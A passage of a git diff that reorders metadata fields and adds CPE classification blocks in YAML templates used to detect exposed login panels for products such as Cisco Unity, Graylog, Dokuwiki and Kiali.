https://github.com/dgtlmoon/changedetection.io - https://changedetection.io/ + classification: + cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Change Detection" - product: changedetection vendor: changedetection + product: changedetection + shodan-query: title:"Change Detection" tags: panel,changedetection,detect - classification: - cpe: cpe:2.3:a:changedetection:changedetection:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: - type: status status: - 200 -# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950 + +# digest: 490a00463044022022e53442307a1e84c8810107836f92c32453b7e1dbf76dfd97e12b81e0ddb11802200302042400b7c214b214e9ca43f63f77d759b19bf20c244b1b9d6fc5f684db95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco-unity-panel.yaml b/http/exposed-panels/cisco-unity-panel.yaml index 1a6723ed46..9dba8428ab 100644 --- a/http/exposed-panels/cisco-unity-panel.yaml +++ b/http/exposed-panels/cisco-unity-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | A Cisco Unity Connection instance was detected. + classification: + cpe: cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: html:"Cisco Unity Connection" - product: unity_connection vendor: cisco + product: unity_connection + shodan-query: html:"Cisco Unity Connection" tags: panel,cisco,unity,login,detect - classification: - cpe: cpe:2.3:a:cisco:unity_connection:*:*:*:*:*:*:*:* http: - method: GET path: @@ -23,7 +23,6 @@ http: - "{{BaseURL}}" stop-at-first-match: true - host-redirects: true max-redirects: 2 @@ -35,7 +34,9 @@ http: - "Cisco Unity Connection Administration" - ">Cisco Unity Connection</a>" condition: or + - type: status status: - 200 -# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502200a80c7d68cfe1ae0075603046be2f5dd175796cb6b9bf4daa92aa80b7981219c022100e47b1b5107b34e7e9aac0afb13a9f878da371df77f19c24fc83ac7ae87da03b9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cisco/cisco-expressway-panel.yaml b/http/exposed-panels/cisco/cisco-expressway-panel.yaml index 511d492c89..f7d963afd1 100644 --- a/http/exposed-panels/cisco/cisco-expressway-panel.yaml +++ b/http/exposed-panels/cisco/cisco-expressway-panel.yaml @@ -8,16 +8,16 @@ info: CISCO Expressway login panel was detected. reference: - https://www.cisco.com/c/en/us/products/unified-communications/expressway-series/index.html + classification: + cpe: cpe:2.3:a:cisco:expressway_software:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: html:"Cisco Expressway" - product: expressway_software vendor: cisco + product: expressway_software + shodan-query: html:"Cisco Expressway" tags: panel,cisco,login,detect - classification: - cpe: cpe:2.3:a:cisco:expressway_software:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: group: 1 regex: - 'Cisco\s+(?:Expressway|Expway)\s+([A-Za-z\s]+)<\/legend>' -# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502203b4103643e4409006f1d2d4a3239769a7db97ab09eff66de20c2573d84127caf022100bd535e00d309f0cba2c2f237f6120b8369a13e92533fef3e0b21d03757d9bedc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index 5bf3d39266..dcde9a2779 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -8,16 +8,16 @@ info: CrafterCMS login panel was detected. reference: - https://craftercms.org/ + classification: + cpe: cpe:2.3:a:craftercms:craftercms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"craftercms" - product: craftercms vendor: craftercms + product: craftercms + shodan-query: http.title:"craftercms" tags: panel,craftercms,login,detect - classification: - cpe: cpe:2.3:a:craftercms:craftercms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: group: 1 regex: - 'Copyright\s+\(C\)\s+([0-9-]+)\s+Crafter' -# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502204ce552931d7737fb1635c321e804d44d3260ba2e52e0b232f6876572ee1a49f502210090a61f8f7f890463f9952689fe0e563bb0fa9ab55e5e309d8f6e89417e399ab4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml index 114ea05aca..04b0e401ab 100644 --- a/http/exposed-panels/cyberchef-panel.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -8,16 +8,16 @@ info: A Cyber Chef Panel was detected reference: - https://cyberchef.org + classification: + cpe: cpe:2.3:a:gchq:cyberchef:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"CyberChef" - product: cyberchef vendor: gchq + product: cyberchef + shodan-query: title:"CyberChef" tags: panel,cyberchef,login,detect - classification: - cpe: cpe:2.3:a:gchq:cyberchef:*:*:*:*:*:*:*:* http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100bf630ba5f09138ed72141fc26d9655fe87a87bcfd945f7d45076e0be1a6dc7f6022100971232301e42001ae83d0d5534dc43ade2fb39ff38cf5f20412e0257d255d250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dialogic-xms-console.yaml b/http/exposed-panels/dialogic-xms-console.yaml index 7df0a85efa..ac05c08034 100644 --- a/http/exposed-panels/dialogic-xms-console.yaml +++ b/http/exposed-panels/dialogic-xms-console.yaml @@ -4,16 +4,16 @@ info: name: Dialogic XMS Admin Console - Detect author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:dialogic:powermedia_xms:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Dialogic XMS Admin Console" - product: powermedia_xms vendor: dialogic + product: powermedia_xms + shodan-query: title:"Dialogic XMS Admin Console" tags: panel,dialogic,admin,login,detect - classification: - cpe: cpe:2.3:a:dialogic:powermedia_xms:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a0047304502204578749594ab0de3efbed02e03712e1574900fdacebe35c859373035b07c1cd1022100f3876c7944b735829649627acc9e128ac5f3b2d128043e3b2aca0566c262acd8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index 8efafeb675..66bf7ba982 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -4,17 +4,17 @@ info: name: Discuz Panel - Detection author: ritikchaddha severity: info + classification: + cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 + vendor: comsenz + product: discuz\\! shodan-query: title:"Discuz!" fofa-query: title="Discuz!" - product: discuz\\! - vendor: comsenz tags: panel,discuz,detect,login - classification: - cpe: cpe:2.3:a:comsenz:discuz\\!:*:*:*:*:*:*:*:* http: - method: GET path: @@ -39,4 +39,5 @@ http: group: 1 regex: - '<em>X([0-9.]+)<\/em><\/p>' -# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210097a74f17ffb2b4e647c84c9056f480dab7093104577773000185b34a1ab7054e0221008c8448bbe03ed2c17134c6cf727d1625726145b2a3046bd08104430ff5020e48:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml index b814e8ed5f..e7b3078789 100644 --- a/http/exposed-panels/dockge-panel.yaml +++ b/http/exposed-panels/dockge-panel.yaml @@ -9,16 +9,16 @@ info: reference: - https://github.com/louislam/dockge - https://dockge.kuma.pet/ + classification: + cpe: cpe:2.3:a:dockge.kuma:dockge:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Dockge" - product: dockge vendor: dockge.kuma + product: dockge + shodan-query: title:"Dockge" tags: panel,dockge,login - classification: - cpe: cpe:2.3:a:dockge.kuma:dockge:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450220261b74576baba68fc27370f9ad1b57ffba4ea3d4efdb86e1a50e30c8d745b831022100da02f9365545cba8f261a052ecb4b758d2ac95b1d72d03c7303dd3982e2a623f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml index 99a0d4f601..08e95aeb54 100644 --- a/http/exposed-panels/dokuwiki-panel.yaml +++ b/http/exposed-panels/dokuwiki-panel.yaml @@ -8,16 +8,16 @@ info: Dokuwiki login panel was detected. reference: - https://www.dokuwiki.org/dokuwiki + classification: + cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.html:"/dokuwiki/" - product: dokuwiki vendor: dokuwiki + product: dokuwiki + shodan-query: http.html:"/dokuwiki/" tags: panel,dokuwiki,login - classification: - cpe: cpe:2.3:a:dokuwiki:dokuwiki:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - 'status_code == 200' - 'contains_any(body, "dokuwiki__header", "content=\"DokuWiki", "/dokuwiki/")' condition: and -# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a0048304602210098f8ad2f891fcec698d9ee9905ad409416c125e1d7ee9677e68b884c3b046d38022100d49af03fbf040d2dbcc1421f61270a2c03c143b8b47897c4660a5633a78b1ed7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml index da3481df8c..b1dbb6b5a4 100644 --- a/http/exposed-panels/doris-panel.yaml +++ b/http/exposed-panels/doris-panel.yaml @@ -5,16 +5,16 @@ info: author: ritikchaddha severity: info description: Doris panel detection template. + classification: + cpe: cpe:2.3:a:apache:doris:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:24048806 - product: doris vendor: apache + product: doris + shodan-query: http.favicon.hash:24048806 tags: doris,panel,login,detect - classification: - cpe: cpe:2.3:a:apache:doris:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100bd68dfe5d1e6c61141aafdf31b9017aafb7b3327c6d0624083b99a164c801806022024d35f5c9e4860e4d8316fbcabc0eae8c139454fc8efc1ac853b5c130784f593:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/emqx-panel.yaml b/http/exposed-panels/emqx-panel.yaml index 4e8d4c5d81..bc0b92bed6 100644 --- a/http/exposed-panels/emqx-panel.yaml +++ b/http/exposed-panels/emqx-panel.yaml @@ -8,16 +8,16 @@ info: EMQX login panel was detected. reference: - https://www.emqx.io/ + classification: + cpe: cpe:2.3:a:emqx:emqx:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"EMQX Dashboard" - product: emqx vendor: emqx + product: emqx + shodan-query: http.title:"EMQX Dashboard" tags: panel,emqx,login,detect - classification: - cpe: cpe:2.3:a:emqx:emqx:*:*:*:*:*:*:*:* http: - method: GET path: @@ -36,4 +36,5 @@ http: group: 1 regex: - 'but\s+(emqx\-dashboard[0-9a-z\-]+)' -# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a004830460221009efc84e19cc4d6dc6aefc4609111f91658caaee5cd8d556bc85e80b944679bd7022100de8c23742fb4a26187f99ab6e36c683ed2d315b2eccd678526331c575eede3d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/endpoint-protector-panel.yaml b/http/exposed-panels/endpoint-protector-panel.yaml index ad41d62a83..fdd15b80dc 100644 --- a/http/exposed-panels/endpoint-protector-panel.yaml +++ b/http/exposed-panels/endpoint-protector-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | Endpoint Protector - Reporting and Administration Tool login panel was detected. + classification: + cpe: cpe:2.3:a:cososys:endpoint_protector:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Endpoint Protector" - product: endpoint_protector vendor: cososys + product: endpoint_protector + shodan-query: http.title:"Endpoint Protector" tags: panel,endpoint,login,detect,endpoint-protector - classification: - cpe: cpe:2.3:a:cososys:endpoint_protector:*:*:*:*:*:*:*:* http: - method: GET path: @@ -30,4 +30,5 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221009bed4da4e4da5599414a6573824bd26d9fd3302ec152617475d9e080e2f7f00b0220033c2ad43304d74f0c0c75ac824107d5b6f40a0d9f4aa352825c15d3621d3383:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/fortinet/forticlientems-panel.yaml b/http/exposed-panels/fortinet/forticlientems-panel.yaml index fee71e4931..8d79a4db66 100644 --- a/http/exposed-panels/fortinet/forticlientems-panel.yaml +++ b/http/exposed-panels/fortinet/forticlientems-panel.yaml @@ -4,16 +4,16 @@ info: name: FortiClient Endpoint Management Server Panel - Detect author: h4sh5 severity: info + classification: + cpe: cpe:2.3:a:fortinet:forticlient_endpoint_management_server:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-800551065 - product: forticlient_endpoint_management_server vendor: fortinet + product: forticlient_endpoint_management_server + shodan-query: http.favicon.hash:-800551065 tags: panel,fortinet,forticlient,ems,login,detect - classification: - cpe: cpe:2.3:a:fortinet:forticlient_endpoint_management_server:*:*:*:*:*:*:*:* http: - method: GET path: @@ -37,4 +37,5 @@ http: group: 1 regex: - 'VERSION_FULL\\u0022: \\u0022(.*?)\\u0022' -# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022014feeb5bf2d6427144c2b239b8cf429fd6e1df8a7e1c457647e31ed12ce9e4f2022100b4ca4c2b3c91cec242d70799bde6d665e4dbefdae552b47ef14db9bade9fe0a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/fossbilling-panel.yaml b/http/exposed-panels/fossbilling-panel.yaml index ba9eb605ba..e3cee2d869 100644 --- a/http/exposed-panels/fossbilling-panel.yaml +++ b/http/exposed-panels/fossbilling-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | FOSSBilling panel has been detected. + classification: + cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"FOSSBilling" - product: fossbilling vendor: fossbilling + product: fossbilling + shodan-query: title:"FOSSBilling" tags: fossbilling,panel,detect - classification: - cpe: cpe:2.3:a:fossbilling:fossbilling:*:*:*:*:*:*:*:* http: - method: GET path: @@ -34,4 +34,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022067804bff6885adbd1fce499c217be8cce2167def6d55018ceb4f9a7382cf19bf022100e419a9d2e2c13a13bea0b34b4dfef7fbafe2e59df6adeb7f1e3d8850ac55e64d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/freshrss-panel.yaml b/http/exposed-panels/freshrss-panel.yaml index cc8da5b7b5..2dd7380f15 100644 --- a/http/exposed-panels/freshrss-panel.yaml +++ b/http/exposed-panels/freshrss-panel.yaml @@ -6,16 +6,16 @@ info: severity: info description: | Freshrss panel has been detected. - metadata: - max-request: 1 - verified: true - shodan-query: title:"Freshrss" - product: freshrss - vendor: freshrss - tags: freshrss,panel,detect - classification: cpe: cpe:2.3:a:freshrss:freshrss:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: freshrss + product: freshrss + shodan-query: title:"Freshrss" + tags: freshrss,panel,detect + http: - method: GET path: @@ -38,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a00473045022100aeda4845bf71709e4bfbadd57d6239891557690e0840fdaf61d041d3c4e0945b022000d0b559c5a4b8b24687f1fa3a3730d6d5e33424af7f2beae04829fee3a354d1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ghost-panel.yaml b/http/exposed-panels/ghost-panel.yaml index cdafd824d1..5f34354e50 100644 --- a/http/exposed-panels/ghost-panel.yaml +++ b/http/exposed-panels/ghost-panel.yaml @@ -8,16 +8,16 @@ info: Beautiful, modern publishing with email newsletters and paid subscriptions built-in. reference: - https://ghost.org/ + classification: + cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: app="Ghost" - product: ghost vendor: ghost + product: ghost + fofa-query: app="Ghost" tags: panel,ghost,login,detect - classification: - cpe: cpe:2.3:a:ghost:ghost:*:*:*:*:*:*:*:* http: - method: GET path: @@ -32,4 +32,5 @@ http: - 'content="Ghost"' condition: or case-insensitive: true -# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950 + +# digest: 490a0046304402202af11dfd43edc17a45dfc121349d833dbd78ff0697151d343819bb4d92d017ad02203d27811c2b3637bcec56100b871612a3681146bc78ceed7655293382f683ef14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/gradle/gradle-develocity-panel.yaml b/http/exposed-panels/gradle/gradle-develocity-panel.yaml index 6a447b6747..5342861c9d 100644 --- a/http/exposed-panels/gradle/gradle-develocity-panel.yaml +++ b/http/exposed-panels/gradle/gradle-develocity-panel.yaml @@ -7,16 +7,16 @@ info: description: Gradle Develocity Build Cache Node login panel was detected. reference: - https://gradle.com/gradle-enterprise-solutions/ - metadata: - max-request: 1 - verified: true - shodan-query: http.html:"Develocity Build Cache Node" - product: build_cache_node - vendor: gradle - tags: panel,gradle,detect,login - classification: cpe: cpe:2.3:a:gradle:build_cache_node:*:*:*:*:*:*:*:* + metadata: + verified: true + max-request: 1 + vendor: gradle + product: build_cache_node + shodan-query: http.html:"Develocity Build Cache Node" + tags: panel,gradle,detect,login + http: - method: GET path: @@ -35,4 +35,5 @@ http: group: 1 regex: - '(?i)"applicationVersion":"([0-9.]+)"' -# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100df41202ea5dab8f7094a0a1b0232959bfb9ea18012d5ebc6b0d824f0f9fac149022100d4d086693942f5547de5f825737aab21335b492088e6344d696c4e5c5ced1962:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/graylog-panel.yaml b/http/exposed-panels/graylog-panel.yaml index af334283e8..657df6dbdb 100644 --- a/http/exposed-panels/graylog-panel.yaml +++ b/http/exposed-panels/graylog-panel.yaml @@ -8,16 +8,16 @@ info: Graylog login panel was detected. reference: - https://graylog.org/ + classification: + cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.title:"Graylog Web Interface" - product: graylog vendor: graylog + product: graylog + shodan-query: http.title:"Graylog Web Interface" tags: panel,graylog,login,detect - classification: - cpe: cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:* http: - method: GET path: @@ -29,4 +29,5 @@ http: - 'status_code == 200' - 'contains(body, "<title>Graylog Web Interface")' condition: and -# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950 + +# digest: 4a0a004730450221008f995ce3c7b298c705668fcac73cd8f3957aa6dd1ac1b0200169f67e781137d40220035b58544c2f27fdd5ed1f00737a58e28617c983fd66692a878f750a77212494:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/ibm/ibm-odm-panel.yaml b/http/exposed-panels/ibm/ibm-odm-panel.yaml index d7393ef61d..15a4d02d1a 100644 --- a/http/exposed-panels/ibm/ibm-odm-panel.yaml +++ b/http/exposed-panels/ibm/ibm-odm-panel.yaml @@ -9,17 +9,17 @@ info: reference: - https://www.ibm.com/docs/en/odm/8.12.0 - https://www.ibm.com/products/operational-decision-manager + classification: + cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - fofa-query: title="Decision Center | Business Console" - shodan-query: http.title:"Decision Center | Business Console" - product: operational_decision_manager vendor: ibm + product: operational_decision_manager + shodan-query: http.title:"Decision Center | Business Console" + fofa-query: title="Decision Center | Business Console" tags: panel,ibm,login,detect,decision-center - classification: - cpe: cpe:2.3:a:ibm:operational_decision_manager:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +45,5 @@ http: group: 1 regex: - '(?i)"js/dist/([0-9.]+)/decisioncenter"' -# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100a3bb9b73dd48cfb52e57e67ee4156d19e151b1439e4b96bb629b532dfc182814022100e1a582afd40b108522924ce3382f701b04da9374b1e0a5945abcbe7d933a576e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/isams-panel.yaml b/http/exposed-panels/isams-panel.yaml index 95bcd5f6c0..8fd0e323b0 100644 --- a/http/exposed-panels/isams-panel.yaml +++ b/http/exposed-panels/isams-panel.yaml @@ -8,16 +8,16 @@ info: iSAMS was detected. reference: - https://www.isams.com/platform/the-platform + classification: + cpe: cpe:2.3:a:iris:isams:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-81573405 - product: isams vendor: iris + product: isams + shodan-query: http.favicon.hash:-81573405 tags: panel,isams,login - classification: - cpe: cpe:2.3:a:iris:isams:*:*:*:*:*:*:*:* http: - method: GET path: @@ -45,4 +45,5 @@ http: group: 1 regex: - 'Version ([0-9\.]+)' -# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100e171cb45841ba1e9060e04b4c12334c376ebb29cd7d9e6571583539549963c54022100cc61c700f49d109869795aadb4a0c668a48a2a8c9a48b192a2310e61ab4acd9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/jsherp-boot-panel.yaml b/http/exposed-panels/jsherp-boot-panel.yaml index 392cffd23c..9e31960fba 100644 --- a/http/exposed-panels/jsherp-boot-panel.yaml +++ b/http/exposed-panels/jsherp-boot-panel.yaml @@ -4,16 +4,16 @@ info: name: JshERP Boot Panel - Detect author: DhiyaneshDk severity: info + classification: + cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: http.favicon.hash:-1298131932 - product: jsherp vendor: jishenghua + product: jsherp + shodan-query: http.favicon.hash:-1298131932 tags: panel,jsherp,login,detect - classification: - cpe: cpe:2.3:a:jishenghua:jsherp:*:*:*:*:*:*:*:* http: - method: GET path: @@ -31,4 +31,5 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100bec80af72f2ea8cbabcb3a071ec454962105327ef75676ad2b63b2ef3369d3c9022100c37f117430984d1abf270ea697e2eaffdfd7f2ff001f5fc52e2facc9d23e2d3f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/kiali-panel.yaml b/http/exposed-panels/kiali-panel.yaml index 801399ec14..f6bbd65d70 100644 --- a/http/exposed-panels/kiali-panel.yaml +++ b/http/exposed-panels/kiali-panel.yaml @@ -8,16 +8,16 @@ info: kiali panel was detected. reference: - https://kiali.io/ + classification: + cpe: cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 - shodan-query: title:"Kiali" - product: kiali vendor: kiali + product: kiali + shodan-query: title:"Kiali" tags: panel,kiali,detect,login - classification: - cpe: cpe:2.3:a:kiali:kiali:*:*:*:*:*:*:*:* http: - method: GET path: @@ -40,4 +40,5 @@ http: group: 1 regex: - '(?i)"Kiali version":\s*"([a-z0-9.]+)"' -# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950 + +# digest: 4b0a00483046022100ac3d039616a98589e8fc1bdf2e20f180157d17b0261e2b32feb03f230a173010022100f493934172a48f156b2938a1b16ff870fed6e624c9480f4f9535b3d70d8a4f4b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/koel-panel.yaml b/http/exposed-panels/koel-panel.yaml index 84a5978c64..27ff0f41b4 100644 --- a/http/exposed-panels/koel-panel.yaml +++ b/http/exposed-panels/koel-panel.yaml @@ -9,16 +9,16 @@ info: reference: - https://koel.dev/ - https://github.com/koel/koel + classification: + cpe: cpe:2.3:a:koel:koel:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 - shodan-query: title:"Koel" - product: koel vendor: koel + product: koel + shodan-query: title:"Koel" tags: panel,koel,login - classification: - cpe: cpe:2.3:a:koel:koel:*:*:*:*:*:*:*:* http: - method: GET path: @@ -26,6 +26,7 @@ http: host-redirects: true max-redirects: 2 + matchers-condition: and matchers: - type: word @@ -37,4 +38,5 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100aafee86cdccec6ee1063eed9beb3d7e0921ccfc7c6e7f4f30b3cf2a8cc908b120220232fd390696ddd45283573ea79cccce1a9ddaac111d0546a2e3385651cac3cbd:922c64590222798bb761d5b6d8e72950 + +# digest: 